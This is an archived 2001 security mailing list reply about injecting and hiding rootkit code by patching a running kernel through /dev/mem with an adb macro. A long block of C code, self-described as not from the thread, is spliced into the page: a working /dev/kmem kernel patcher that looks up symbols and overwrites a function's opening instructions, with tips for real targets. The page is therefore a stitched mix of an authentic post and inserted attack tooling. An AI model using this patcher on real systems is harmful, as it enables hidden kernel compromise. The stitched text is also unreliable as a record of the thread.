Vulnerability Development mailing list archives
Re: Positive uses for rootkits
From: Gregor Binder <gbinder () sysfive com>
Date: Thu, 29 Mar 2001 10:53:55 +0200
Ryan Permeh on Wed, Mar 28, 2001 at 09:31:28AM -0800:

> there are kernel debuggers that use /dev/kmem. using this same methodology, you could create an in-memory kernel patcher that could inject rootkit code into a running kernel.

Ryan,

absolutely, and you don't even have to have much more than a debugger macro, no need for a patching tool. (On systems that have such a debugger.) Think about this:

    echo "$<your_leet_adb_macro" | adb -I /tmp -w -k /dev/ksyms /dev/mem

where /tmp/your_leet_adb_macro merely needs to contain positioning code, and the instructions you want to place at whatever location you decided to patch, all written as adb commands.

Since you have symbols available, it shouldn't be too hard to find the call you want to mess with ... getting the assembly instructions right will be a lot harder, as well as staying inside the function, not freezing/panicking your box during development (well, just boot in kadb and undo your changes if that happens and deal with it ;))

The concept above is the Solaris way to do it, while it would still work on many SVR4 style UNIXes. On BSDs, you might get there with kdb or ddb, on Linux you'd probably have to use something homegrown targeted for this particular use, since no one will build the SGI kernel debugger into their system just for you to penetrate it :)

I think it would be *a lot* easier to hide a rootkit like this, and one of the few techniques that will get you good results even on trusted boxes (given you can get to /dev/mem somehow).

Regards,

--
Gregor Binder <gregor.binder () sysfive com> http://sysfive.com/
sysfive.com GmbH UNIX. Networking. Security. Applications.
PGP id: 0x20C6DA55 fp: 18AB 2DD0 F8FA D710 1EDC A97A B128 01C0 20C6 DA55
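The "homegrown" Linux equivalent of the adb macro above, as an added example that is not from this thread or from any of its authors: a minimal in-memory patcher that does what the debugger does by hand, i.e. resolves a symbol through a namelist, seeks to that address in the memory device and overwrites the instruction bytes. Everything in it is constructed: the System.map-style symbol table, the addresses, and the "kernel" image, which is a 4 KiB temp file so the code runs without root. On a real target the device would be /dev/kmem (its offsets are kernel virtual addresses, so base is 0), the namelist would be the running kernel's System.map, and the instruction bytes would be the ones the function actually starts with; note that Linux removed /dev/kmem in 5.13 and that KASLR makes a static System.map address wrong on its own, so the check that the expected bytes are present before writing is the part a practitioner should keep. The x86-64 encodings used (0x55 push rbp, 48 89 e5 mov rbp,rsp, 0xc3 ret) are real; the symbol names are made up.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Resolve `name` in a System.map-style table ("addr type name" per line).
 * This stands in for the /dev/ksyms namelist that adb is given with -k.
 * Returns the address, or 0 if the symbol is absent. */
uint64_t kmem_lookup_symbol(const char *sysmap, const char *name)
{
    const char *p = sysmap;
    while (*p) {
        const char *eol = strchr(p, '\n');
        size_t len = eol ? (size_t)(eol - p) : strlen(p);
        char line[256], type, sym[128];
        unsigned long long a;
        if (len < sizeof line) {
            memcpy(line, p, len);
            line[len] = '\0';
            if (sscanf(line, "%llx %c %127s", &a, &type, sym) == 3 &&
                strcmp(sym, name) == 0)
                return (uint64_t)a;
        }
        if (!eol) break;
        p = eol + 1;
    }
    return 0;
}

/* Overwrite `len` bytes at kernel virtual address `addr` through the memory
 * device `dev`, but only after checking that the bytes there are `expect`:
 * an address from the wrong namelist (or under KASLR) points at other code.
 * `base` is the virtual address at offset 0 of `dev` (0 for a real /dev/kmem).
 * Returns 0 on success, -1 on I/O failure, -2 if the pre-check fails. */
int kmem_patch(const char *dev, uint64_t base, uint64_t addr,
               const uint8_t *expect, const uint8_t *patch, size_t len)
{
    uint8_t cur[64];
    if (len > sizeof cur) return -1;
    int fd = open(dev, O_RDWR);
    if (fd < 0) return -1;
    off_t off = (off_t)(addr - base);
    int rc = 0;
    if (pread(fd, cur, len, off) != (ssize_t)len) rc = -1;
    else if (memcmp(cur, expect, len) != 0) rc = -2;
    else if (pwrite(fd, patch, len, off) != (ssize_t)len) rc = -1;
    close(fd);
    return rc;
}

/* Constructed namelist for the demo; the addresses and names are made up. */
const char kmem_demo_sysmap[] =
    "ffffffff81000000 T _text\n"
    "ffffffff81000040 T demo_function\n";
const uint64_t kmem_demo_base = 0xffffffff81000000ULL;

/* Self-contained run: write a constructed 4 KiB "kernel image" to a temp
 * file, then patch demo_function's first instruction to a bare `ret`, the
 * simplest way to take a kernel function out of the call path. Returns 0 if
 * the patch applied, read back intact, and a retry was refused (-2). */
int kmem_demo(void)
{
    static const uint8_t prologue[] = { 0x55, 0x48, 0x89, 0xe5 }; /* push rbp; mov rbp,rsp */
    static const uint8_t patch[]    = { 0xc3, 0x90, 0x90, 0x90 }; /* ret; nop; nop; nop */
    uint8_t image[4096], back[sizeof patch];
    memset(image, 0x90, sizeof image);             /* NOP filler */
    memcpy(image + 0x40, prologue, sizeof prologue); /* demo_function lives at base+0x40 */

    char path[] = "/tmp/kmem_demo_XXXXXX";
    int fd = mkstemp(path);
    if (fd < 0) return -1;
    ssize_t n = write(fd, image, sizeof image);
    close(fd);
    if (n != (ssize_t)sizeof image) { unlink(path); return -1; }

    int rc = -1;
    uint64_t addr = kmem_lookup_symbol(kmem_demo_sysmap, "demo_function");
    if (addr) {
        rc = kmem_patch(path, kmem_demo_base, addr, prologue, patch, sizeof patch);
        if (rc == 0) {
            /* read back through the same "device" and confirm the bytes landed */
            fd = open(path, O_RDONLY);
            if (fd < 0 || pread(fd, back, sizeof back, (off_t)(addr - kmem_demo_base)) != (ssize_t)sizeof back
                || memcmp(back, patch, sizeof back) != 0)
                rc = -3;
            if (fd >= 0) close(fd);
        }
        /* the pre-check must now reject the same patch: the prologue is gone */
        if (rc == 0 && kmem_patch(path, kmem_demo_base, addr, prologue, patch, sizeof patch) != -2)
            rc = -4;
    }
    unlink(path);
    return rc;
}
```

Pointing kmem_patch at a real memory device is the same call with a different path and base; what the demo does not cover is the part Gregor calls the hard bit, choosing instruction bytes that stay inside the function and leave the stack sane, which the pre-check cannot save you from.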
Current thread:
- Re: Positive uses for rootkits, (continued)
- Re: Positive uses for rootkits Ben Ford (Mar 28)
- Re: Positive uses for rootkits Big Woz (Mar 28)
- Re: Positive uses for rootkits Renee Teunissen (Mar 26)
- Re: Positive uses for rootkits Dick Visser (Mar 26)
- The use of immunix Renee Teunissen (Mar 26)
- Re: Positive uses for rootkits Ben Ford (Mar 27)
- Re: Positive uses for rootkits Martin 'Goran' Moravec (Mar 28)
- Re: Positive uses for rootkits Kev (Mar 28)
- Re: Positive uses for rootkits Ryan Permeh (Mar 29)
- Kernel-level security (was Re: Positive uses for rootkits) Craig Boston (Mar 29)
- Re: Positive uses for rootkits Gregor Binder (Mar 29)
- ICQ exploit Geo. (Mar 28)
- Re: ICQ exploit Jonathan James (Mar 28)
- Re: ICQ exploit Mikko Ruskola (Mar 28)
- Re: ICQ exploit Knud Erik Højgaard - CyberCity Support (Mar 28)
- Re: ICQ exploit John (Mar 28)
- Re: ICQ exploit Blake Frantz (Mar 28)